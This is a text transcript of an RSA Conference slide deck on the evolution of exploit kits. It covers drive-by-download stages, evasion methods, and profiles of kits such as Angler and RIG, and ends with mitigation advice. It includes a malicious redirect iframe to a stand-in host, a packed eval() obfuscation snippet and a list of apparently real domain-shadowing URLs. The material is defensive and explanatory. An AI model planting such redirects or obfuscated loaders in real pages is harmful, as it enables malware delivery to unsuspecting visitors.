exploit zoo: the evolution of exploit kits - rsa … · #rsac definition 2 exploit kit/pack, (ek):...
TRANSCRIPT
SESSION ID:
#RSAC
Jordan Forssman
Exploit Zoo: The Evolution of Exploit Kits
TTA1-R09
Sr Director, ProductProofpoint, Inc.Twitter: @Jordan4z
#RSAC
Definition
2
Exploit Kit/Pack, (EK): A set of resources that facilitate the distribution of malware by exploiting client-side software.
#RSAC
Anatomy of a Drive-by-Download
3
<iframe src=“www.evil.org”>
Redirect
#RSAC
Anatomy of a Drive-by-Download
4
Redirect
EK Landing Page
<iframe src=“www.evil.org”>
#RSAC
Anatomy of a Drive-by-Download
5
Redirect
EK Landing Page
Malware Server
<iframe src=“www.evil.org”>
#RSAC
Anatomy of a Drive-by-Download
6
Redirect
EK Landing Page
Malware Server
<iframe src=“www.evil.org”>
#RSAC
Anatomy of a Drive-by-Download
7
Redirect
EK Landing Page
Malware Server
C2 Server
<iframe src=“www.evil.org”>
#RSAC
Anatomy of a Drive-by-Download
8
Redirect
EK Landing Page
Malware Server
C2 Server
0 Distribution
1 Exploitation
2 Deployment
3 Escalation
<iframe src=“www.evil.org”>
#RSAC
A Perfect Storm
9
• Wordpress/Joomla
• Online Advertising
• Scripting Languages
Lowering Tech Barriers
• Adobe Flash
• Internet Explorer
• Java
• Silverlight
Proliferation of Vulnerable Apps • Exploit Development
• Malware Creation
• Targeting Technology
• Organized Crime
Division of Labor
• Clickfraud
• Payloads for Sale
• Botnets
• Exploit Kits
The Underground Economy
#RSAC
The EK Zoo
10
Image Sources:contagiodump.blogspotmalware.dontneedcoffee.comkrebsonsecurity.comxylibox.com
kahusecurity.comblog.malwaremustdie.orgmalekal.com
#RSAC
Targeting Vs Evasion
11
#RSAC
Stage 0: Distribution - Targeting Vs Evasion
12
Phishing
Injection
Watering Hole
Long-Lining
Dynamic DNS
Fast-Fluxing
Targ
etin
gEvasio
nObfuscation
SEO Poisoning
#RSAC
Dynamic DNS & Fast-Fluxing
13
Dynamic DNS
Constantly reset DNS records to point to new IP address
Available as a service, IPs limited to within a specific ASN
Fast-Fluxing
Constantly reset DNS records to point
to a new IP address
Custom built, access to global IPs
www.evil.org 202.53.190.1124.136.12.181114.218.9.123202.53.190.1124.136.12.181114.218.9.123202.53.190.1124.136.12.181114.218.9.123202.53.190.1124.136.12.181114.218.9.123
#RSAC
Stage 0: Targeting Vs Evasion
14
Phishing
Injection
Watering Hole
Long-Lining
Dynamic DNS
Fast-Fluxing
Domain Shadowing
Targ
etin
gEvasio
nOpen RedirectDomain Rotation
Obfuscation
Encryption
SEO Poisoning
#RSAC
Domain Shadowing
15
Creating sub-domains on compromised legit servers to redirect to illicit pages
162.244.33.179
http://aleksandryn.car-ledlights.com/farm_microseconds_bodice_heaves/726966984312851711
http://aleksandryn.car-ledlights.com/acquisitiveness_loners_nostalgia_deadlocks/987509513944626652
http://aleksandryn.car-ledlights.com/hared-steeds-unsaddled-worthier/817449604617897447
http://prajakirk.car-ledlights.com/…
http://medimnmidtpunktoformulen.car-ledlights.com/...http://lawyeress.4banadult.net/…
http://chensu.cariddeancom.jp/…
http://machinerquefluentness.7716e.tv/…
http://pidtyistachtbaarst.4banadult.net/…
http://corralseaantvir.indiacypher.com/…
http://kyttyrisell.vasic.ws/…
http://komiteanmietintjen.10musumee.com/…
http://nheader.c0930c.com/…
#RSAC
Stage 0: Distribution - Targeting Vs Evasion
16
Phishing
Injection
Watering Hole
Long-Lining
Traffic Direction
Systems (TDS)
Malvertising
Finger-printing
Dynamic DNS
Fast-Fluxing
Domain Shadowing
Targ
etin
gEvasio
nOpen Redirect
Domain Rotation
Obfuscation
Encryption
SEO Poisoning
#RSAC
Stage 0: Distribution
17
Redirect
EK Landing Page
Malware Server
C2 Server
<iframe src=“www.evil.org”>
#RSAC
Stage 0: Distribution
18
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while…
#RSAC
Stage 0: Distribution
19
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while…
#RSAC
Stage 0: Distribution
20
T
Referrer OK?
Endeval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while…
#RSAC
Stage 0: Distribution
21
T
IP OK?
D
Referrer OK?
End Endeval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while…
#RSAC
Stage 0: Distribution
22
T
IP OK?
D
Referrer OK?
S
Browser OK?
End End Endeval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while…
#RSAC
Stage 0: Distribution
23
T
IP OK?
D
Referrer OK?
S
Browser OK?
End End Endeval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while…
#RSAC
Stage 1: Exploitation – Exploits 1
24
Multiple Exploits
“Exploit Kit/Pack”
#RSAC
Stage 1: Exploitation – Exploits 2
25
Multiple Exploits
Chained Exploits
Each performing necessary functions
#RSAC
Stage 1: Exploitation – Exploits 3
26
Multiple Exploits
Chained Exploits
Fingerprinting Exploits
Source: http://help.adobe.com/en_US/FlashPlatform/reference/actionscript/3/flash/system/Capabilities.html
#RSAC
Stage 1: Exploitation – Exploits 4
27
Multiple Exploits
Chained Exploits
Fingerprinting Exploits
Evasive Exploits
#RSAC
Stage 1: Exploitation – Exploits 5
28
Multiple Exploits
Chained Exploits
Fingerprinting Exploits
Evasive Exploits
Code Execution\Memory Corruption Exploits
#RSAC
Stage 1: Exploitation – Exploits 6
29
Multiple Exploits
Chained Exploits
Fingerprinting Exploits
Evasive Exploits
Code Execution\Memory Corruption Exploits
Local Privilege Escalation Exploits
#RSAC
Stage 1: Exploitation - Example
30
#RSAC
Stage 1: Exploitation -Example
31
#RSAC
Stage 1: Exploitation - Example
32
#RSAC
Stage 1: Exploitation - Example
33
#RSAC
Stage 1: Exploitation - Example
34
#RSAC
Stage 1: Exploitation - Example
35
#RSAC
Stage 1: Exploitation - Example
36
CVE-2015-8651CVE-2015-8446CVE-2015-7645
#RSAC
Stage 1: Exploitation - Example
37
CVE-2016-0034
#RSAC
Stage 1: Exploitation
38
T
IP OK?
D
Referrer OK?
S
Browser OK?
End End Endeval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while…
#RSAC
Stage 2: Deployment - Dropper
39
#RSAC
Stage 2: Deployment
40
T
IP OK?
D
Referrer OK?
S
Browser OK?
End End Endeval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while…
#RSAC
Stage 2: Deployment
41
T
IP OK?
D
Referrer OK?
S
Browser OK?
End End Endeval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while…
#RSAC
Stage 0/1/2/3: Signature Evasion
42
Scan4You
Antivirus Checker
URLs, Exploits, Droppers, Payloads
#RSAC
Stage 2: Deployment - Payloads
43
Ransomware
Backdoor\RAT
Infostealer
Botnet
Banking Trojan
Rootkit
#RSAC
Stage 2/3: Deployment – VM Evasion
44
Human Specific
• Mouse Mvmt• CAPTCHA• Zip
Config. Specific
• Sleep Calls• CPU Cycles• SSDT De-
Hooking• File-less
Malware
Environ. Specific
• Vrsn Checks• PHP Preg
Replace• IP Checks
VM Specific
• System Service • File-based entropy• CPU Core/RAM• Registry Keys• UUIDS
#RSAC
Stage 3: Escalation - Evasion
45
Dynamic DNS
Fast Fluxing
Domain Generation Algorithms (DGA)
Open C2 Channels
Gmail
Other…
#RSAC
Stage 3: Escalation
46
T
IP OK?
D
Referrer OK?
S
Browser OK?
End End Endeval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while…
#RSAC
Stage 3: Escalation
47
T
IP OK?
D
Referrer OK?
S
Browser OK?
End End Endeval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while…
#RSAC
Sweet Orange
48
PayloadsAndromedaDarkshellKovterQbotRerdomRevetonRovnixTeslacryptTSPY_BANKERZemot
Exploits
1
7
2
11
1
1
Prevalence
Features• Iframe Cyptor• Scan4You
Integration• TDS
Price$2,500 or $1,400/month
Traffic Rate150,000/day
Infection Rate10-15%
Source: Google Trends
#RSAC
Sweet Orange
49
Image Source: http://malware.dontneedcoffee.com/2013/10/flimrans-affiliate-borracho.html
Dashboard
Image Source: https://www.virusbulletin.com/virusbulletin/2013/03/what-are-browser-exploit-kits-look-sweet-orange-and-propack
#RSAC
Nuclear
50
PayloadsAndromedaBoaxxeCaphawCerberCryptowallCovertonGluptebaGootkitKazyKelihosKovterLockyRovnixShadeSpyeyeTeslacryptVawtrakViknokWaldek-GZemotZeus
Exploits (v3)
1
15
2
7
2
1
Prevalence
Features• Infecting Domain
Rotator• Domain & Payload
Detection check• Payload & Exploit
Update• LP Obfuscation• XMLDOM AV
Check (cve-2013-733)
• Sub-leasing Service
PriceWMZ 500/week WMZ1,600/month
Source: Google Trends
Infection Rate10%
#RSAC
Nuclear
51
Image Source: https://blog.checkpoint.com/wp-content/uploads/2016/04/Inside-Nuclear-1-2.pdf
Dashboard
#RSAC
Magnitude
52
PayloadsAleuronCerberCryptodefenseCryptolockerCryptowall 1, 2, 3CutwailDorkbotKelihosNecursNymaimRedymsSimdaStiturTepferTinbaTracurUrausyVawtrakWinwebsecZeroAccessZeus
Exploits
1
3
5
2
1
Prevalence
Features• Exploit
Obfuscation• Scan4you
Integration• PluginDetect• Domain Rotator• TDS (Blocks
countries with Russian extradition Treaties)
• Traffic Share (Biz model)
Price15-20% of Infected Machines
Source: Google Trends
aka “Top-exp”, “Deathtouch”, “Popads”
3
16
#RSAC
RIG
53
PayloadsCryptodefenseCryptowall 1, 2, 3CutwailDyrangesDyreOphionLockerPonyQbotTinbaTofseeZeus
Exploits
6
2
2
Prevalence
Features• Obfuscated LP• Virtual Dedicated
Server for Exploits• XOR Encoded
Shellcode• Scan4You
Integration• Domain Rotator• PluginDetect• XMLDOM AV Check• Cloudflare Anti-
DDOS Protection• Only targets IE• Hosted @ Eurobyte
Price$60/day$300/week
Source: Google Trends
9
1
#RSAC
Angler
54
PayloadsAlphaCryptAndromedaAsproxBedepBloCryptBunituCaphawCryptowall 1, 2, 3, 4CryptXXXCTB LockerCutwailDridexDynamerDyre[Fileless Infection]GameoverZeusGluptebaGootkitKolerKovterNecursPonyPoweliksRevetonRombertikShifuTeslaCryptThreatFinderTinbaTorrentlockerTrapwotVawtrakZeus
Exploits
4
2
4
Prevalence
Features• Domain & Payload
AV check• AV Detection• Dropper
encryption• Sandbox
Detection• Exploit
obfuscation• Domain
Shadowing• Dynamic DNS• DGA• File-less Malware• TDS with IP
recording• 302 Cushioning
Price
Source: Google Trends
1
1
1
23
Infection Rate40%
$ ???
#RSAC
Blackhole
55
Most prevalent
Author, “Paunch”, arrested 2013
BlackholeAngler
Source: Google Trends
#RSAC
The Future of Exploit Kits?
56
Vulnerable applications are key
http://arstechnica.com/information-technology/2016/05/html5-by-default-googles-plan-to-make-chromes-flash-click-to-play/
http://krebsonsecurity.com/
#RSAC
The Future of Exploit Kits?
57
#RSAC
The Future of Exploit Kits?
58
Source: http://virusguides.com/exploit-generator-kit-links-three-cyber-espionage-campaigns-originate-china/
#RSAC
The Future of Exploit Kits?
59
Successful at evading signature & reputation defense as well as newer behavioral sandboxes
Frequently updated at low cost
Cross-platform & un-patchable as the attack relies on end-user & social engineering to bypass automated defenses
Low up-front & maintenance cost increases ROI
https://www.proofpoint.com/MaliciousMacrosSource: The Cybercrime Economics of Malicious Macros
Malicious Macros
#RSAC
The Future of Exploit Kits?
60
https://www.proofpoint.com/MaliciousMacrosSource: The Cybercrime Economics of Malicious Macros
#RSAC
Update: June 2016
61
The end of Angler?
#RSAC
Update June 2016
62
Blackhole
RIG
Angler
Nuclear
Magnitude
Source: Google Trends
#RSAC
The Future of Exploit Kits?
63
Source: http://www.blog.geoedge.com/#!New-Security-Report-HTML5-Susceptibility-to-Malware-in-Video-Ads/c193z/576789860cf2a84be5a0205e
#RSAC
The Future of Exploit Kits?
64
Source: http://blog.trendmicro.com/trendlabs-security-intelligence/godless-mobile-malware-uses-multiple-exploits-root-devices/
#RSAC
Mitigation – The Obvious Stuff
65
Patch!
Secunia Personal Software Inspector
Windows Update
Lock-down
Limit Javascript (NoScript, ScriptSafe)
Disable Flash/Silverlight/ActiveX
MS EMET
Back-ups
Use Anti-Virus
Train Users
#RSAC
Mitigation – Get Informed
66
Follow these sites/blogs:
malware.dontneedcoffee.com
malware-traffic-analysis.net
blog.malwarebytes.net
proofpoint.com/us/threat-insight
blog.malwaremustdie.org
contagiodump.blogspot
malwaresigs.com
kahusecurity.com
blog.talosintel.com
trustwave.com/Resources/SpiderLabs-
Blog/
Use these resources
Recorded Future Cyber Daily
CVE Details RSS Feed
#RSAC
Mitigation – Open Source Tools
67
For your Network
NIDS
Suricata/Snort/Bro
Leverage ETOpen & Snort Rules
SecurityOnion
Includes above tools & other network analyzers:
Sguil & SqertXplicoNetwork Miner
For your Endpoints
AntiVirus
Microsoft EMET
OSSECHIDS
Sysinternals (Sysmon)Process CreationNetwork connectionFile creation time changesLogs event from early boot
#RSAC
What Next?
68
Over the next week:
Start to audit the Obvious, find out where you stand
Over the next month:
Get Informed, fix any holes in the obvious
Over the next 6 months:
Evaluate and deploy necessary tools and training programs
#RSAC
The EK Zoo
69
AnglerNeutrino
Blackhole
Nuclear
Sweet Orange
Crimepack
Magnitude
RIG
Phoenix Whitehole
Sakura
FiestaGoon
Infinity
LightsOut
Flashpack
Archie
Astrum
Zuponcic
Hanjuan
Kaixin
NiterisNull Hole
CK
Snet
Styx
Ramayana
Crime Boss
HiManKein
Impact
Grandsoftx2o
Impact
White Lotus
RSPandorasBox
Glazunov
KaiXin
Silence
RedKit
NoMatch
BestPack
Nice Pack
Pro Pack
BleedingLife
Neosploit
NucSoft
AlphaPack
Eleonore
ANRAM
Techno
Yang
Siberia
Heirarchy
Zhi Zhu
YesSavage
Arabella
Lupit
Intoxicated
NapoleoniPack
JustExploit
MetapackK0de
Shaman’s Dream Singer’s
Deathpack
FlooP
Demonpack
UnderwaterEK
MaxImpossible Sploit
PDF Xploit
sprEaDEr
FSPack
Zombie
Kameleon
Clean Pack
Lucky Sploit
Web Attacker
IcePack
Cry217
eCore
FirePack
Prime
n404
Mpack
MassInfectTarget
Merry Christmas
My Poly Sploit
Liberty
Infector Sploit25
sPack Apache ExploitIEKit
Tornado
Papka
Sphere